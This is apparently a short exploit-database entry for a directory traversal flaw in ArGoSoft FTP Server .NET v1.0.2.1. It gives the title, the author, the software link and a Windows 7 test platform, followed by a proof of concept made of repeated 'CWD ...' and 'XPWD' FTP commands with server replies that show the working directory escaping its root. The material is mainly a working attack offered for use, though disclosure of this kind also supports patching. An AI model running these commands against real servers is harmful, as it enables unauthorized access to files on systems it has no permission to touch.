15 lines
No EOL
430 B
Text
15 lines
No EOL
430 B
Text
# Exploit Title: ArGoSoft FTP Server .NET v.1.0.2.1 directory traversal
|
|
# Date: 16.03.2010
|
|
# Author: dmnt
|
|
# Software Link: http://www.argosoft.com/files/apps/FtpServerSetup.msi
|
|
# Version: ArGoSoft FTP Server .NET v.1.0.2.1
|
|
# Tested on: Windows 7
|
|
# Code :
|
|
CWD ...
|
|
250 Requested file action OK, completed
|
|
XPWD
|
|
257 "/.../" is working directory
|
|
CWD ...
|
|
250 Requested file action OK, completed
|
|
XPWD
|
|
257 "/.../.../" is working directory |